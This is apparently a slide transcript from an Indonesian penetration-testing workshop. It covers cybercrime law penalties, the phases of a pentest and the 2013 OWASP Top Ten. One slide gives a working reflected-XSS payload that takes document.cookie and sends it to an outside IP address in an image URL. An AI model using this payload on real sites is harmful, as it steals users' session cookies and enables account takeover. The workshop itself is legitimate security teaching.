workshop 101 - penetration testing & vulnerability assessment
DESCRIPTION
- Penetration testing and Vulnerability assessment system using OpenVas. - Privilege escalation - Pivoting server - metasploitTRANSCRIPT
Workshop 101Penetration testing & Vulnerability assessment
Hat Secure | Workshop 101
Penetration testing
Hat Secure | Workshop 101
Penetration testing
– Wewenang sah– Pengendalian kerusakan– Tanggung jawab– Lingkup kerja– Masalah privasi– Tugas untuk memperingatkan
Hat Secure | Workshop 101
UU ITE
Hat Secure | Workshop 101
Pasal 30
• Sengaja mengakses komputer atau sistem elektronik tanpa ijin.
• Pidana 6 - 8 tahun• Denda 600jt - 800jt
Hat Secure | Workshop 101
Pasal 32
• Sengaja dan tanpa ijin melakukan pemindahan, perusakan dan membuka informasi rahasia.
• Pidana 8 - 10 tahun penjara• Denda 2M - 5M
Hat Secure | Workshop 101
Pasal 33
• Sengaja dan tanpa ijin melakukan tindakan apapun yang mengakibatkan sistem terganggu.
• Pidana 10 tahun• Denda 10M
Hat Secure | Workshop 101
Pasal 35
• Sengaja dan tanpa ijin melakukan pemalsuan Dokumen elektronik agar seolah-olah data yang otentik.
• Pidana 12 tahun penjara • Denda 12 M
Hat Secure | Workshop 101
Hat Secure | Workshop 101
Penetration testing
• Scope• Information gathering• Target identification• Target enumeration• Vulnerability mapping
Hat Secure | Workshop 101
Penetration testing
• Exploitation• Post Exploitation• Social Engineering
Hat Secure | Workshop 101
The Open Web Application Security Project (OWASP)
• Komunitas terbuka yang didedikasikan untuk mengembangkan dan memelihara aplikasi yang dapat dipercaya.
• Misi OWASP adalah untuk membuat perangkat lunak keamanan.
• Lisensi Free Open Source.
Hat Secure | Workshop 101
OWASP Top Ten
2013
A1 Injection
A2 Broken Authentication and Session Management
A3 Cross-Site Scripting (XSS)
A4 Insecure Direct Object References
A5 Security Misconfiguration
A6 Sensitive Data Exposure
A7 Missing Function Level Access Control
A8 Cross-Site Request Forgery (CSRF)
A9 Using Known Vulnerable Components
A10 Unvalidated Redirects and Forwards
Hat Secure | Workshop 101
A1 - Injection
• Kelemahan injeksi terjadi ketika data yang tidak dipercaya dikirim ke interpreter sebagai bagian dari suatu perintah atau query.
• Serangan yang populer :– Database Injection– LDAP injection– OS command injection
Hat Secure | Workshop 101
A2 - Broken Authentification and Session Management
• Aplikasi yang berhubungan dengan otentikasi dan manajemen sesi sering tidak diterapkan dengan benar.
Hat Secure | Workshop 101
SESSION FIXATION
Hat Secure | Workshop 101
A3 - Cross Site Scripting
• Kelemahan XSS terjadi ketika aplikasi mengambil data yang tidak dipercaya dan mengirimkannya ke browser web tanpa validasi yang tepat atau meloloskannya.
• Dibagi menjadi beberapa kategori, yang populer :– XSS Reflected– XSS Stored
Hat Secure | Workshop 101
XSS Reflected
<script>var tmp = document.cookie; document.write('<img src="http://192.168.0.103/?'%2btmp%2b'"/>');</script>
Hat Secure | Workshop 101
A4 - Insecure Direct Object Reference
• Pengembang mengekspos referensi ke sebuah obyek implementasi internal, seperti file, direktori, rekaman database, atau kunci, melalui URL atau bentuk parameter.
• Populer :– Relative Path Disclosure– Full Path Disclosure
Hat Secure | Workshop 101
Full Path Disclosure
Hat Secure | Workshop 101
A5 - Security Misconfiguration
• Celah ini muncul akibat dari kesalahan konfigurasi keamanan.
• Populer :– PHPMyadmin (tanpa password)– Firewall = Off– dan sebagainya
Hat Secure | Workshop 101
A6 - Sensitif Data Exposure
• Banyak aplikasi web tidak melindungi data sensitif– kartu kredit– ID pajak– otentifikasi yang tidak benar.
Hat Secure | Workshop 101
A7 - Missing Functional Access Control
• Sebagian besar aplikasi web memverifikasi tingkat hak akses sebelum user interface terlihat.
• Kesalahan dari pengembang menyebabkan halaman web dapat diakses tanpa memiliki hak akses.
Hat Secure | Workshop 101
A8 - Cross Site Request Forgery
• Celah keamanan pada aplikasi web dengan cara mengeksploitasi suatu task dari sebuah Web dengan memanfaatkan Autentikasi yang dimiliki oleh target.
Hat Secure | Workshop 101
A9 - Using Components with Known Vulnerabilities
• Komponen, seperti library, framework, dan modul perangkat lunak lain, hampir selalu berjalan dengan hak penuh.
• Jika komponen yang memiliki celah ini dimanfaatkan, serangan seperti itu dapat menyebabkan kehilangan data yang serius hingga server yang anda miliki diambil alih.
Hat Secure | Workshop 101
A10 - Unvalidated Redirects and Forwards
• Meneruskan pengguna ke halaman web lain tetapi tanpa konfirmasi.
• Tanpa konfirmasi, user tidak sadar jika posisi terkini ada di web lain.
Hat Secure | Workshop 101
Pentest Labs